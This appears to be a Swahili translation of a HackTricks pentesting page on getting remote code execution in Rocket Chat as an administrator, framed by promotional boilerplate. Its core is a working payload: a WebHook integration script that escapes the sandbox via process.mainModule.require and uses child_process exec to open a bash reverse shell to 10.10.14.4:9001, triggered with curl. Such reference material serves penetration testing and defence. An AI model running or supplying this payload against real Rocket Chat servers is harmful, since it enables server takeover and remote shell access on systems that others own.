Rocket Chat

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA USAJILI!
Pata swag rasmi ya PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Websec | Uw Cybersecurity Specialist

RCE

Ikiwa wewe ni msimamizi ndani ya Rocket Chat unaweza kupata RCE.

Nenda kwa Integrations na chagua New Integration na chagua moja kati ya: Incoming WebHook au Outgoing WebHook.
/admin/integrations/incoming

Kulingana na nyaraka , zote hutumia ES2015 / ECMAScript 6 (kimsingi JavaScript) kusindika data. Kwa hivyo tupate rev shell kwa javascript kama:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

Configure WebHook (channel na chapisha kama jina la mtumiaji lazima liwepo):

Configure skripti ya WebHook:

Hifadhi mabadiliko
Pata URL ya WebHook iliyozalishwa:

Iiite kwa kutumia curl na unapaswa kupokea rev shell

Websec | Uw Cybersecurity Specialist

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousPython NextSpecial HTTP headers

Last updated 3 days ago